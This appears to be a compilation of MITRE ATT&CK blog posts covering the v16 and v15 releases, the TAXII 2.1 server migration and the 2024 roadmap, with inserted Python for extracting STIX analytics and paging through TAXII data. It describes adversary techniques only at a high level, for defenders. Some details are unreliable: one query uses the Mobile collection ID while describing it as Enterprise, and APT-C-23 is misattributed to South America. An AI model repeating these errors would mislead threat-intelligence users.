MITRE

MITRE ATT&CK® stands for MITRE Adversarial Tactics, Techniques, and Common Knowledge (ATT&CK). The MITRE ATT&CK framework is a curated knowledge base and model for cyber adversary behavior, reflecting the various phases of an adversary’s attack lifecycle and the platforms they are known to target.

v16 Cloud Rebalancing, Analytics,

V16 Brings (Re)Balance: Restructured Cloud, New Analytics, and More Cybercriminals

In v16, we’re all about balance — striking that perfect chord between familiar and pioneering to keep things real and actionable.

This update fine-tunes how we cover cloud environments, finding equilibrium between depth and practicality to ensure it remains practical for defenders. As part of our balancing act, we’re also expanding on familiar threats while introducing some fresh behaviors and groups. This release also features optimized detection engineering offerings and enhanced usability across ATT&CK tools, with the goal of a balanced resource for everyone.

For all the details on our updates/additions across Techniques, Software, Groups and Campaigns take a look at our release notes, our detailed changelog, or our changelog.json.

Enterprise

Cloud Realigned

We’ve been working to fine-tune the balance between abstraction and detail in the Cloud matrix to cover various cloud environments and threats, while staying specific enough to guide actionable defenses. v16 unveils our efforts to keep the matrix practical for defenders across diverse setups, clarify technique descriptions, and ensure that it’s intuitively navigable.

We’d like to introduce the recalibrated Cloud matrix, now featuring four platforms (IaaS, SaaS, Identity Provider, and Office Suite) — key changes include:

  • Broadened Identity concept to cover multiple products and services, reflecting how identity functions work similarly across cloud setups.
    – This includes incorporating Azure AD into Identity Provider for clearer cloud functionality distinctions.
  • Clarified the Google Workspace and Microsoft 365 overlap with the new Office Suite platform, as they behave nearly identically at the technique level.

Behavior Balancing Act

We maintained our perfect balance formula (Familiar + Novel = Reality) with this release, expanding on existing techniques with behaviors you’ll recognize but that weren’t previously in the matrix — for example, T1557.004: Adversary-in-the-Middle: Evil Twin, T1213.004: Data from Information Repositories: Customer Relationship Management Software, and T1213: Data from Information Repositories: Messaging Applications.

For the novelty factor, this release also features some intriguing new behaviors, like T1496.004: Resource Hijacking: Cloud Service Hijacking, where adversaries hijack compromised SaaS applications (like email and messaging services) to send spam, while also draining your resources and impacting service availability. We also added T1666: Modify Cloud Resource Hierarchy, highlighting how IaaS hierarchies can be manipulated to evade defenses and exploit resources by creating covert subscriptions in Azure or detaching AWS accounts from their organizations.

Our Linux and macOS behavior repository also grew, with the highly demanded T1546.017: Event Triggered Execution: Udev Rules, where adversaries can persist on Linux by tweaking udev rules to run malicious code, exploiting its permissions and background capabilities. The new T1558.005: Steal or Forge Kerberos Tickets: Ccache Files sub reminds us how adversaries can swipe Kerberos tickets from credential cache files to access multiple services as the current user — and even indulge in a little privilege escalation or lateral movement.

For the full list of (sub) technique additions and expansions, check out the changelog!

What’s Next: We’re looking into optimizing a couple of disparate areas — including restructuring Defense Evasion for clarity and usability. One approach we’re assessing is to organize techniques based on the specific behaviors they represent: those that focus on evading detection and those aimed at circumventing specific mitigations. We’re also evaluating how to refactor metadata to only feature what’s usable and relevant. Have thoughts or would like to contribute insights to either discussion? Share them on Slack or email!

Defensive Coverage

Detection Engineering

Our Defensive goal for this year was to expand detections and mitigations, and help you act more effectively through detection engineering. With the optimization of our pseudocode format for analytics — reflecting real-world query language that is meant to serve as a template for your tailored queries — v16 is coming in hot with a whole host of new analytic blueprints.

In Execution, we’ve added 85 new analytics to help you identify techniques that execute malicious code, 120 new analytics under Credential Access aimed at capturing the behaviors used to steal credentials, and 26 new Cloud analytics designed to highlight techniques that exploit Microsoft 365 & Azure AD.

As a bonus, v16 also features a STIX analytic extraction Python script that lets you quickly pull and export analytics.
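As an added example (not the STIX extraction script the post refers to), the following Python pulls the analytics out of a STIX 2.1 bundle and flattens them to CSV. It assumes the ATT&CK STIX conventions: techniques are attack-pattern objects carrying a mitre-attack external reference, data components are x-mitre-data-component objects, and each analytic is the description of a detects relationship from a data component to a technique; the bundle is constructed sample data and every ID in it is a placeholder.

```python
from __future__ import annotations

import csv
import io
import json
from collections import defaultdict

# Constructed sample bundle, not real ATT&CK content; IDs are placeholders.
SAMPLE_BUNDLE = json.dumps({
    "type": "bundle",
    "id": "bundle--11111111-1111-4111-8111-111111111111",
    "objects": [
        {"type": "attack-pattern",
         "id": "attack-pattern--aaaaaaaa-0000-4000-8000-000000000001",
         "name": "Sample Technique A",
         "external_references": [
             {"source_name": "mitre-attack", "external_id": "T9901"}]},
        {"type": "attack-pattern",  # revoked: its analytics must be skipped
         "id": "attack-pattern--aaaaaaaa-0000-4000-8000-000000000002",
         "name": "Sample Technique B", "revoked": True,
         "external_references": [
             {"source_name": "mitre-attack", "external_id": "T9902"}]},
        {"type": "x-mitre-data-source",
         "id": "x-mitre-data-source--bbbbbbbb-0000-4000-8000-000000000001",
         "name": "Process"},
        {"type": "x-mitre-data-component",
         "id": "x-mitre-data-component--cccccccc-0000-4000-8000-000000000001",
         "name": "Process Creation",
         "x_mitre_data_source_ref":
             "x-mitre-data-source--bbbbbbbb-0000-4000-8000-000000000001"},
        {"type": "relationship", "relationship_type": "detects",
         "id": "relationship--dddddddd-0000-4000-8000-000000000001",
         "source_ref": "x-mitre-data-component--cccccccc-0000-4000-8000-000000000001",
         "target_ref": "attack-pattern--aaaaaaaa-0000-4000-8000-000000000001",
         "description": "Analytic 1 (constructed): sourcetype=sysmon EventCode=1 "
                        "ParentImage=*winword.exe"},
        {"type": "relationship", "relationship_type": "detects",
         "id": "relationship--dddddddd-0000-4000-8000-000000000002",
         "source_ref": "x-mitre-data-component--cccccccc-0000-4000-8000-000000000001",
         "target_ref": "attack-pattern--aaaaaaaa-0000-4000-8000-000000000002",
         "description": "Points at a revoked technique; must not be exported."},
        {"type": "relationship", "relationship_type": "uses",  # not a detection
         "id": "relationship--dddddddd-0000-4000-8000-000000000003",
         "source_ref": "intrusion-set--eeeeeeee-0000-4000-8000-000000000001",
         "target_ref": "attack-pattern--aaaaaaaa-0000-4000-8000-000000000001",
         "description": "Group uses technique; not an analytic."},
    ],
})


def load_bundle(text: str) -> list[dict]:
    """Parse a STIX bundle and return its objects (empty list if none)."""
    bundle = json.loads(text)
    if bundle.get("type") != "bundle":
        raise ValueError("not a STIX bundle")
    return bundle.get("objects", [])


def attack_id(obj: dict) -> str | None:
    """Return the ATT&CK ID (e.g. T1059) from the mitre-attack external reference."""
    for ref in obj.get("external_references", []):
        if ref.get("source_name") == "mitre-attack":
            return ref.get("external_id")
    return None


def is_active(obj: dict) -> bool:
    """ATT&CK flags retired objects with `revoked` or `x_mitre_deprecated`."""
    return not (obj.get("revoked") or obj.get("x_mitre_deprecated"))


def extract_analytics(objects: list[dict]) -> dict[str, list[dict]]:
    """Map technique ID -> analytics, each tagged with its data component and source."""
    by_id = {o["id"]: o for o in objects}
    result: dict[str, list[dict]] = defaultdict(list)
    for rel in objects:
        if rel.get("type") != "relationship" or rel.get("relationship_type") != "detects":
            continue
        component = by_id.get(rel.get("source_ref"))
        technique = by_id.get(rel.get("target_ref"))
        # Skip dangling references and anything retired on either end.
        if not (component and technique and is_active(rel)
                and is_active(component) and is_active(technique)):
            continue
        tid = attack_id(technique)
        if tid is None:
            continue
        source = by_id.get(component.get("x_mitre_data_source_ref"), {})
        result[tid].append({
            "technique": technique.get("name", ""),
            "data_source": source.get("name", ""),
            "data_component": component.get("name", ""),
            "analytic": rel.get("description", "").strip(),
        })
    return dict(result)


def to_csv(analytics: dict[str, list[dict]]) -> str:
    """Flatten the analytics to CSV text for a detection-engineering backlog."""
    fields = ["technique_id", "technique", "data_source", "data_component", "analytic"]
    buf = io.StringIO()
    writer = csv.DictWriter(buf, fieldnames=fields)
    writer.writeheader()
    for tid in sorted(analytics):
        for row in analytics[tid]:
            writer.writerow({"technique_id": tid, **row})
    return buf.getvalue()
```

On a real bundle, pass the text of the enterprise-attack JSON file to load_bundle and the same two functions apply unchanged.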

Mitigations

On the Mitigations front, we added a new mitigation: Out of Band Communication, focused on secure, alternative communication channels — like encrypted messaging or satellite lines — to keep critical comms safe and running during incidents and to bypass any compromised network systems. We also enhanced Active Directory Configuration with a community contribution that adds clearer examples and detailed interpretations of group policy settings. As we continue to update Mitigations, we need your insights! When you share specific use cases, clearer examples, and detailed configurations, you’re making it easier for fellow defenders to understand and implement mitigations effectively.

What’s Next: We have a lot on our docket and some areas we’re still considering, including implementing STIX IDs for data components to improve clarity and tracking, developing analytics for Initial Access, Exfiltration, and Discovery, and revamping our data sources for actionability. We’ll also be looking into multi-event analytics that examine how different sources, like file modifications and process creation, interact within a short time frame instead of focusing on just one collection source. We would love your insights and collaboration on these initiatives — email or join #defensive_attack to get involved!

Cyber Threat Intelligence

Our CTI updates also embody the perfect balance formula: we’re working to close the representation gaps in the cybercrime space while continuing to update state-attributed groups.

Some of the cybercriminal additions in v16 include G1032 (Inc Ransom), a group notorious for its double-extortion tactics, as well as the G1040 (Play) ransomware group, which utilizes advanced encryption and targets high-value victims. Both groups exploit known vulnerabilities to gain initial access and steal data before deploying their ransomware. Additionally, G1037 operates as an initial access broker, using phishing techniques to infiltrate networks.

On the State front, we updated G0007 and G0034, both linked to different units of Russia’s General Staff Main Intelligence Directorate (GRU), with common behaviors, such as using malicious Microsoft Office attachments in their spear-phishing emails.

What’s Next: Moving forward, we intend to continue staying responsive to your contributions — highlighting groups, software, and campaigns that matter to practitioners, while also showcasing unique and exceptional tradecraft to highlight techniques. Got brilliant insights or behaviors to share? Join us on #attack-cti, or contribute.

Software Development

Our Software goal this year was to enhance usability and streamline processes for ATT&CK tools and infrastructure. We’ve been working hard towards these goals, but most importantly, we introduced our new TAXII server: the MITRE ATT&CK Workbench TAXII 2.1 Server and open-sourced the TAXII 2.1 code to enable you to establish your own servers within your organization and contribute to enhancing it. As you’re exploring the new 2.1 server, remember that we’ll be retiring the TAXII 2.0 server on December 18. To continue receiving updated ATT&CK data, you’ll need to migrate from cti-taxii.mitre.org to attack-taxii.mitre.org. Check out our TAXII 2.1 blog post for more details.

What’s Next: We’re planning on rolling out ATT&CK Data Model 1.0, which will introduce Platform objects and assign ATT&CK IDs to data components for easier tracking. We’ll also be updating the defensive objects structure for intuitiveness and simplifying the Workbench process. On the website front, our goal is to move towards a modern framework and ensure consistency and clarity across ATT&CK tools and documentation with STIX 2.1.

You Bring the Insights, We’ll Bring the Updates

We deeply value our community, and your in-the-wild examples and real-world implementations are what ensure that ATT&CK remains relevant and actionable, so if you see something, contrib something.

Looking ahead, we can’t wait to keep partnering with you on everything we have lined up — as well as all the things we haven’t planned yet but will absolutely end up on our agenda, thanks to your great contributions.

Connect with us on Email, Twitter, LinkedIn, or Slack.

©2024 The MITRE Corporation. ALL RIGHTS RESERVED. Approved for public release. Distribution unlimited 24–00779–4.


v16 Cloud Rebalancing, Analytics, was originally published in MITRE ATT&CK® on Medium.

Introducing TAXII 2.1 and a fond farewell to the TAXII 2.0 Server

As mentioned in our 2024 Roadmap and the v15 release blog, we’re excited to introduce our new TAXII server and the latest addition to the ATT&CK Workbench software suite: the MITRE ATT&CK Workbench TAXII 2.1 Server. We’ve open-sourced the TAXII 2.1 code on GitHub, allowing you to set up your own servers within your organization and contribute to its improvement.

While you’re diving into the new 2.1 server, don’t forget: our TAXII 2.0 server is retiring on December 18.

To continue receiving updated ATT&CK data, you’ll need to migrate from cti-taxii.mitre.org to attack-taxii.mitre.org. However, this migration may involve more than just a URL change. Given the transition from STIX 2.0 to STIX 2.1, the complexity of your migration will depend on how deeply your applications are integrated with STIX 2.0. We recommend assessing the impact on your systems and planning your migration accordingly.

Getting Started with TAXII 2.1

Ready to explore the MITRE ATT&CK Workbench TAXII 2.1 server?

Why TAXII 2.1?

We know the ATT&CK community has relied on our public TAXII 2.0 server, but it had issues like frequent outages. The TAXII 2.1 server addresses these problems with a more reliable and smooth experience. It’s built for scalability and stress-tested with real-world benchmarks from TAXII 2.0, ensuring you’re less likely to face major outages. Additionally, the new server introduces pagination, which was missing in TAXII 2.0. This means you can fetch smaller chunks of data instead of the entire ~20 MB STIX collection, speeding up the process and reducing data transfer costs.

A critical update to note is that our TAXII 2.1 server will exclusively host STIX 2.1 content moving forward. This change is part of our long-term strategy to shift away from STIX 2.0, aligning with the latest standards.

The new TAXII 2.1 server is also more powerful and capable than the previous version. We designed it to smoothly integrate with Workbench, making CTI management as seamless as possible. If you’re already using the ATT&CK Workbench in your CTI workflows, you can easily edit and maintain CTI data without needing additional tools. The TAXII 2.1 server integrates with the ATT&CK Workbench software suite, and can automatically sync with the Workbench REST API (the Workbench “back end”).

Workbench users can add objects, STIX collections, and bundles, and the TAXII 2.1 server will automatically make them available via its REST API. You don’t need to change your editor workflows — just bring the TAXII 2.1 server online in your Workbench container stack, and it will sync every 30 minutes by default (administrators can adjust this if needed). TAXII 2.1 is also optional, and you can continue using Workbench as usual without it.

Of note, the TAXII 2.1 specification outlines two “sharing models” for TAXII server implementations:

  • The Collection model, where the TAXII server allows producers to host a set of CTI data that can be requested by consumers: TAXII Clients and Servers exchange information in a request-response model.
  • The Channel model, where the TAXII server uses the publish-subscribe pattern to allow producers to push data to many consumers and consumers to receive data from many producers.

Given that Channels are still loosely defined in the TAXII specification, we decided to only implement the Collections model outlined in the TAXII 2.1 specification. However, we are open to adding support for a pub-sub model in future releases.

A Brief Guide to Accessing Threat Intelligence Data

With the new TAXII 2.1 server, you can still access your cyber threat intel in STIX format through the publicly accessible REST API, just like its predecessor (cti-taxii.mitre.org) that’s been around for over 6 years. Even though this server has some sophisticated functionality, querying it is actually pretty simple. The following guide will show you the basics and help you easily get the threat intelligence data you need.

With TAXII 2.1 running on a RESTful API model and using standard HTTP requests, you can connect to the server using any HTTP client you like. This includes popular tools like curl, wget, httpie, or Postman. This flexibility allows you to seamlessly integrate TAXII 2.1 queries into your existing workflows and tools.

Let’s dive into how to structure these requests and interpret the responses.

Importantly, all TAXII 2.1 requests require a special Accept header:

GET /taxii2/ HTTP/1.1
Accept: application/taxii+json;version=2.1
Host: attack-taxii.mitre.org

Here is an example of setting the Accept header using the curl tool:

curl --request GET \
  --url https://attack-taxii.mitre.org/taxii2/ \
  --header 'Accept: application/taxii+json;version=2.1'

The request above goes to the TAXII server’s Discovery endpoint, which returns a list of available API roots that the TAXII server offers. Each API Root is the “root” URL of that particular instance of the TAXII API. Our TAXII server only hosts one API Root, which we can see clearly from the response body:

{
  "title": "MITRE ATT&CK TAXII 2.1",
  "description": "This API Root contains TAXII 2.1 REST API endpoints that serve MITRE ATT&CK STIX 2.1 data",
  "default": "api/v21",
  "api_roots": [
    "api/v21"
  ]
}

Great! Now that we have the API Root, let’s see if we can query for a list of available TAXII Collections:

curl --request GET \
  --url https://attack-taxii.mitre.org/api/v21/collections/ \
  --header 'Accept: application/taxii+json;version=2.1'

The response should look something like the following:

{
  "collections": [
    {
      "id": "x-mitre-collection--1f5f1533-f617-4ca8-9ab4-6a02367fa019",
      "title": "Enterprise ATT&CK",
      "description": "ATT&CK for Enterprise provides a knowledge base of real-world adversary behavior targeting traditional enterprise networks. ATT&CK for Enterprise covers the following platforms: Windows, macOS, Linux, PRE, Office 365, Google Workspace, IaaS, Network, and Containers.",
      "canRead": true,
      "canWrite": false,
      "mediaTypes": [
        "application/taxii+json;version=2.1",
        "application/taxii+json"
      ]
    },
    {
      "id": "x-mitre-collection--90c00720-636b-4485-b342-8751d232bf09",
      "title": "ICS ATT&CK",

    },
    {
      "id": "x-mitre-collection--dac0d2d7-8653-445c-9bff-82f934c1e858",
      "title": "Mobile ATT&CK",

    }
  ]
}

The response lists three objects that match the main ATT&CK domains: Enterprise, Mobile, and ICS. Of note, TAXII Collections and STIX Collections are different concepts — with TAXII Collections operating as versatile containers for CTI objects. For our MITRE ATT&CK TAXII server, we’ve mapped each TAXII Collection directly to an ATT&CK domain. This means querying a TAXII Collection from our server provides data from just one domain, simplifying the user experience and aligning with the ATT&CK framework. While this mapping isn’t required by the TAXII protocol and other servers may organize collections differently, we chose this method to make our server more intuitive for the ATT&CK community.

Now that we have our API Root and the available TAXII Collections, we’re ready to retrieve some CTI objects:

curl --request GET \
  --url 'https://attack-taxii.mitre.org/api/v21/collections/x-mitre-collection--dac0d2d7-8653-445c-9bff-82f934c1e858/objects?limit=100' \
  --header 'Accept: application/taxii+json;version=2.1'

This requests the first 100 objects from the Enterprise ATT&CK collection. The response should look something like this:

{
  "more": true,
  "next": "1",
  "objects": [ ... 100 objects ... ]
}

If the ‘more’ property is set to true and the ‘next’ property is populated, then the client can paginate through the remaining records using the ‘next’ URL parameter along with the same original query options. So, we can request the second page of 100 objects by simply adding the ‘next=1’ query parameter to the original request:

curl --request GET \
  --url 'https://attack-taxii.mitre.org/api/v21/collections/x-mitre-collection--dac0d2d7-8653-445c-9bff-82f934c1e858/objects?limit=100&next=1' \
  --header 'Accept: application/taxii+json;version=2.1'
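As an added example (not MITRE’s client code), the following Python walks every page of a collection using only what the post shows: the mandatory Accept header, the limit parameter, and the more/next fields. The http_fetch_json fetcher is for live use against attack-taxii.mitre.org; make_fake_fetcher is a constructed stand-in that imitates the paging above so the logic can be checked offline, and the stop conditions (a repeated or missing next token, a page cap) are my additions rather than anything the post specifies.

```python
from __future__ import annotations

import json
import urllib.parse
import urllib.request
from typing import Callable, Iterator

ACCEPT = "application/taxii+json;version=2.1"  # required on every TAXII 2.1 request
SERVER = "https://attack-taxii.mitre.org"
API_ROOT = "api/v21"
# Collection ID shown in the post's collection listing.
MOBILE_COLLECTION = "x-mitre-collection--dac0d2d7-8653-445c-9bff-82f934c1e858"


def http_fetch_json(url: str) -> dict:
    """Live fetcher: GET with the TAXII 2.1 Accept header, reject odd content types."""
    req = urllib.request.Request(url, headers={"Accept": ACCEPT})
    with urllib.request.urlopen(req, timeout=60) as resp:
        ctype = resp.headers.get("Content-Type", "")
        if "taxii+json" not in ctype:
            raise ValueError(f"unexpected Content-Type from TAXII server: {ctype}")
        return json.load(resp)


def objects_url(collection_id: str, limit: int, next_token: str | None,
                server: str = SERVER, api_root: str = API_ROOT) -> str:
    """Build the /objects URL, re-sending the original `limit` alongside `next`."""
    params = {"limit": str(limit)}
    if next_token is not None:
        params["next"] = next_token
    query = urllib.parse.urlencode(params)
    return f"{server}/{api_root}/collections/{collection_id}/objects?{query}"


def iter_objects(collection_id: str,
                 fetch_json: Callable[[str], dict] = http_fetch_json,
                 limit: int = 100, max_pages: int = 10_000) -> Iterator[dict]:
    """Yield every STIX object in the collection, following more/next page by page."""
    next_token: str | None = None
    seen_tokens: set[str] = set()
    for _ in range(max_pages):
        page = fetch_json(objects_url(collection_id, limit, next_token))
        for obj in page.get("objects", []):
            yield obj
        if not page.get("more"):
            return  # last page reached
        next_token = page.get("next")
        # A server that says more=true but repeats or omits `next` would loop forever.
        if not next_token or next_token in seen_tokens:
            raise RuntimeError("more=true without a fresh next token")
        seen_tokens.add(next_token)
    raise RuntimeError(f"gave up after {max_pages} pages")


def count_by_type(collection_id: str, fetch_json: Callable[[str], dict],
                  limit: int = 100) -> dict[str, int]:
    """Tally object types across the whole collection (one common first use of a dump)."""
    counts: dict[str, int] = {}
    for obj in iter_objects(collection_id, fetch_json, limit):
        counts[obj["type"]] = counts.get(obj["type"], 0) + 1
    return counts


def make_fake_fetcher(total: int) -> Callable[[str], dict]:
    """Constructed stand-in for the server: `total` placeholder objects, paged like the post
    (the second page is requested with next=1, the third with next=2, ...)."""
    objs = [{"type": "attack-pattern",
             "id": f"attack-pattern--{i:08d}-0000-4000-8000-000000000000",
             "name": f"Sample object {i}"} for i in range(total)]

    def fetch(url: str) -> dict:
        qs = urllib.parse.parse_qs(urllib.parse.urlsplit(url).query)
        limit = int(qs["limit"][0])
        page_no = int(qs.get("next", ["0"])[0])
        start = page_no * limit
        more = start + limit < total
        page = {"more": more, "objects": objs[start:start + limit]}
        if more:
            page["next"] = str(page_no + 1)
        return page

    return fetch


if __name__ == "__main__":
    # Live run against the public server; swap in make_fake_fetcher(250) to stay offline.
    print(count_by_type(MOBILE_COLLECTION, http_fetch_json))
```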

What’s Next for ATT&CK Workbench TAXII 2.1

We believe the release of the MITRE ATT&CK Workbench TAXII 2.1 server is a big step forward for threat intelligence sharing — and we have even more exciting integrations on our roadmap to make the TAXII experience even smoother:

  • Workbench UI indicators that signal whether an object or collection is actively being shared through TAXII;
  • Workbench UI toggles that allow users to pause (or enable) the sharing of objects and collections with TAXII;
  • Workbench role-based access controls (RBAC) for TAXII administration.

Stay tuned for more updates and enhancements as we continue to evolve our tools!

©2024 The MITRE Corporation. ALL RIGHTS RESERVED. Approved for public release. Distribution unlimited 24–00195–2.


Introducing TAXII 2.1 and a fond farewell to the TAXII 2.0 Server was originally published in MITRE ATT&CK® on Medium.

ATT&CK v15 Brings the Action

ATT&CK v15 Brings the Action: Upgraded Detections, New Analytic Format, & Cross-Domain Adversary Insights

v15 is all about actionability and bringing defenders’ reality into focus — we prioritized what you need to detect, and how you can do it more effectively with detection engineering upgrades, and deeper intelligence insights across platforms. This release also reflects the new expansion rhythm, balancing both well-known and emerging behaviors to reflect how trends and activity are experienced in the field.

For the details on our updates/additions across Techniques, Software, Groups and Campaigns take a look at our release notes, our detailed changelog, or our changelog.json.

Enterprise | Familiar + Novel = Reality

With v15 we were aiming for the perfect balance of familiar behaviors you’ve probably seen countless times (e.g., T1027.013: Obfuscated Files or Information: Encrypted/Encoded File, T1665: Hide Infrastructure), as well as newer, emerging trends. The shadowy domain of Resource Development was expanded to illuminate how adversaries are using generative artificial intelligence tools, like large language models (LLMs), to support various malicious activities (T1588.007: Obtain Capabilities: Artificial Intelligence). And it’s not just about gaining initial access anymore — we added T1584.008: Compromise Infrastructure: Network Devices to capture how threat groups are hacking into third-party network devices, including small office/home office routers, to use these devices to facilitate further targeting.

Cloud | More Actionability

As outlined in the ATT&CK 2024 Roadmap, we’re striving to make the Cloud matrix more approachable for defenders of all skill levels. With this release, we focused on providing a broader set of defensive measures, resources, and insights for CI/CD pipelines, Infrastructure as Code (IaC), and Identity. v15 features new mitigations and data sources on token protection, along with more specific references to Okta logs. T1072: Software Deployment Tools was expanded to include broad execution of T1651: Cloud Administration Command, reflecting how threat actors are turning cloud native tools like AWS Systems Manager into remote access trojans.

We ramped up resources for CI/CD pipelines and IaC, and made some refinements to Identity, with the expansion of T1484: Domain Policy Modification to include not just Azure AD, but also other identity-as-a-service providers like Okta. T1556: Modify Authentication Process gained a new sub (T1556.009: Conditional Access Policies) exploring how threat actors have tampered with or disabled conditional access policies for ongoing access to compromised accounts. We also expanded T1136.003: Create Account: Cloud Account with additional service account insights.

What’s Next: v16 will feature robust identity and detection updates, as well as the platform rebalancing operations, where we’re focusing on covering a wider range of cloud environments and threats, while making it more intuitive to prioritize techniques relevant to a specific platform.

Defensive Coverage | Upgrading, Converting & Restructuring Defensive Measures

You’ll find expanded detections in v15 to assist your detection engineering. Previously, we structured our analytics in a pseudocode format that was consistent with the Cyber Analytic Repository (CAR). In some cases this was hard to understand.

In v15, we transformed that format into a real-world query language style (like Splunk) that is compatible with various security tools. These upgrades are featured in detections across the framework including some techniques within the Execution tactic.

Our aim with these upgrades is to make clear that the data source itself is the data you should be collecting, and to provide an understandable format that pairs well with everyday defender tools (i.e., SIEMs and sensors).

We have also synced up some mitigations within the parent-to-sub-technique relationship. Our team analyzed a list of sub-techniques that had mitigations the parent technique did not have. In v15, you will find that some parent techniques now reflect the mitigations seen in their sub-techniques.

What’s Next: As we gear up for October, we’ll be completing the Execution detections, refining Credential Access detections, diving into Cloud analytics, and restructuring our data sources for better accessibility.

ICS | Cross-Domain Campaigns

We’ve been working to retrofit major incidents in the ICS space to improve understanding and showcase how ICS and enterprise techniques intersect in each event. V15 illuminates some of the ICS-Enterprise integration efforts, with the release of four cross-mapped campaigns:

· Starting with Triton, the Safety Instrumented System attack of 2017 that shook the petrochemical industry to its core.

· Then there’s C0032, a campaign spanning various utilities from 2014 to 2017, often grouped with the petrochemical incident but distinctly different in nature.

· Next up, Unitronics, a spree that zeroed in on specific devices and impacted utilities and organizations worldwide. This campaign saw adversaries disrupting device interfaces to make them unusable for end users.

· Fast forward to 2022 Ukraine Electric Power, where we witnessed a glimpse into the future of ICS attacks, with hypervisor features and shared domain access exploited to infiltrate ICS systems and unleash havoc. The campaign highlights key considerations regarding hypervisor usage across multiple domains, and the abuse of native features in vendor software.

2022 Ukraine also spawned two new ICS techniques that are featured in this release: T0895: Autorun Image and T0894: System Binary Proxy Execution via vendor application binaries.

What’s Next: v16 will launch ICS sub-techniques, along with a structured cross-walk to enable mapping between deprecated and new techniques. We’ll also be releasing new asset coverage and updates on our exploration into incorporating more sectors into the ICS matrix.

Mobile | New Techniques, Software, Groups & Mitigations

With help from our community, this release incorporates new techniques — exploiting software vulnerabilities for initial access, and adversaries performing active and automated discovery for the lowdown on your network setup — as well as fresh software and groups. We also added a new mitigation to the Mobile matrix, M1059 Do Not Mitigate (for Mobile), as a sneak peek at the new mitigations that will be added in future releases. This release also features the first Mobile campaign, C0033, associated with PROMETHIUM (G0056). The group primarily targets Windows devices; however, recent reporting and external contributions demonstrated a shift to mobile exploitation on Android and iOS devices.

We added Mobile techniques to existing Groups and Software to illuminate the shift to include mobile exploitation. This includes building out the APT-C-23 (G1028) profile, mirroring this South American threat group’s targeting of Android and iOS devices, and recording how BITTER (G1002) has distributed malicious apps via SMS, WhatsApp, and various social media platforms.

What’s Next: In the coming months, we’ll be rolling out more structured detections, and boosting proactivity across Mobile by evaluating incorporation of pre-intrusion techniques, like active and passive reconnaissance, and acquiring or developing resources for targeting.

Cyber Threat Intelligence | More Cybercriminal, Underrepresented Groups

We’re working towards better reflecting the threat landscape by infusing the framework with more cybercriminal and underreported adversary activity. This release showcases new cybercriminal operations and highlights Malteiro, a criminal group believed to be based in Brazil. They are known for operating and distributing the Mispadu/URSA banking trojan through a malware-as-a-service model. Banking trojans, a notorious threat in Latin America, are increasingly spreading their chaos across borders, courtesy of malware developers selling tools to overseas operators. Malteiro’s operations exemplify this targeting shift, evident in a recent campaign affecting European entities across various sectors.

What’s Next: We’ll continue conducting thorough assessments of Groups, Software, and Campaigns to up the framework realism quotient and provide clearer insights into adversary activities. We’re also teaming up with ATT&CK domain leads to expand coverage of cross-domain intrusions.

Software Dev | TAXII 2.1, FTW

We’ve been working towards our goals of enhancing Navigator’s usability and streamlining processes for ATT&CK Workbench. Most importantly, we’re taking our TAXII server to new heights, and by December 18, we’ll be retiring the TAXII 2.0 server and transitioning to the upgraded TAXII 2.1 version. You can locate the documentation for the TAXII 2.1 server in our GitHub repository.

What’s Next: We’ll be continuing to enhance usability on ATT&CK Workbench and Navigator, and building towards swifter Groups and Software releases. Mark your calendars to update the URLs for TAXII 2.1 clients to connect to https://attack-taxii.mitre.org instead of https://cti-taxii.mitre.org!

In Conclusion | Field Reports, Benefactors

We’re always on the lookout for field reports and insights from those of you on the ground. Your observations play a crucial role in improving ATT&CK’s tactical utility — so remember, if you see something, contrib something. Curious about how a contribution becomes a technique? Check out our video that walks you through the process.

If you’re interested in contributing to ATT&CK’s overall autonomy, flexibility, and free services, you can find more details on our Benefactor page. We are deeply grateful to our initial cohort of benefactors, SOC Prime, Tidal Cyber, and Zimperium, for their generous support.

©2024 The MITRE Corporation. ALL RIGHTS RESERVED. Approved for public release. Distribution unlimited 24–00779–3.


ATT&CK v15 Brings the Action was originally published in MITRE ATT&CK® on Medium.

ATT&CK 2024 Roadmap

Enhancing usability, expanding scope, optimizing defenses

2023 was a dynamic year for ATT&CK. We marked a decade of progress since the framework’s inception and achieved some key milestones to make ATT&CK more accessible for a wider community. Our scope (slightly) expanded to encompass activities adjacent to direct Enterprise interactions, such as non-technical, deceptive practices and social engineering techniques (Financial Theft, Impersonation, and Spearphishing Voice). We enhanced detection capabilities with integrated notes, pseudocode from CAR, and BZAR-based analytics. The ICS matrix welcomed the addition of Assets to enhance inter-sector communication and mapping. We rolled out Mobile-specific data sources, structured detections, and behaviors like smishing, quishing, and vishing. Website navigation was improved, along with a faster Search bar, and updates that hit you faster than you can say “resources/changelog.html”. We also maintained a steady cadence of updates and new content from the ATT&CK team and external contributors.

In October, we successfully held ATT&CKcon 4.0, with new insights shared and realistic applications demonstrated by practitioners. And finally, we kickstarted the ATT&CK Benefactor program.

ATT&CKcon 4.0 Themed Snacks

2024 Roadmap: Vision & Goals

Since launching ATT&CK, we’ve been humbled to witness how the community has integrated it across widely varied spheres and around the globe. The vision for ATT&CK has always been to enable the broadest use across the widest spectrum of stakeholders — whether you’re cross-mapping between domains, annotating and developing tailored Navigator layers, or using the framework as a blueprint to build multi-platform threat models. ATT&CK was designed to empower defenders precisely where they need it most. This is the core thesis for ATT&CK, and as its stewards, we’ll continue prioritizing measures that advance a more inclusive, relevant, and actionable framework.

In line with this vision, our 2024 goals are to bolster broader usability and enhance actionable defensive measures for practitioners across every domain. This includes exploring scope adjustments and platform rebalancing, as well as implementing structural modifications with the introduction of ICS sub-techniques. A core focus will be reinforcing defensive mechanisms and optimizing their user-friendliness. We’ll be bridging Linux and macOS information gaps and enhancing prominent adversary representation. The ATT&CK Navigator, Workbench, and website will feature reengineering to improve accessibility and enable swifter ATT&CK Group/Software/Campaign updates. We’ll also be sunsetting the TAXII 2.0 server by December 18 in favor of the upgraded TAXII 2.1 version. Finally, we’ll continue amplifying the key driver behind ATT&CK — community collaboration. This includes hosting ATT&CKcon 5.0 in October, and maintaining support for the European Union (EU) and Asia-Pacific (APAC) ATT&CK Community Workshops.

Enterprise | Integrated Defense

In tune with ATT&CK’s vision, we’re continuously re-evaluating Enterprise’s scope to more accurately reflect the threats faced by real defenders. Matrices and platforms are conceptual schematics, not real-world structures, and we’re assessing realignments, expansions, and refinements of platforms to represent interconnected organizations, the adversaries they encounter, and the reality of defenders. Our goal is to advance a cohesive and integrated framework that provides more functional use cases and empowers users to visualize and create adaptable defenses against cross-platform threats.

Cloud | Matrix Balance & More Actionability

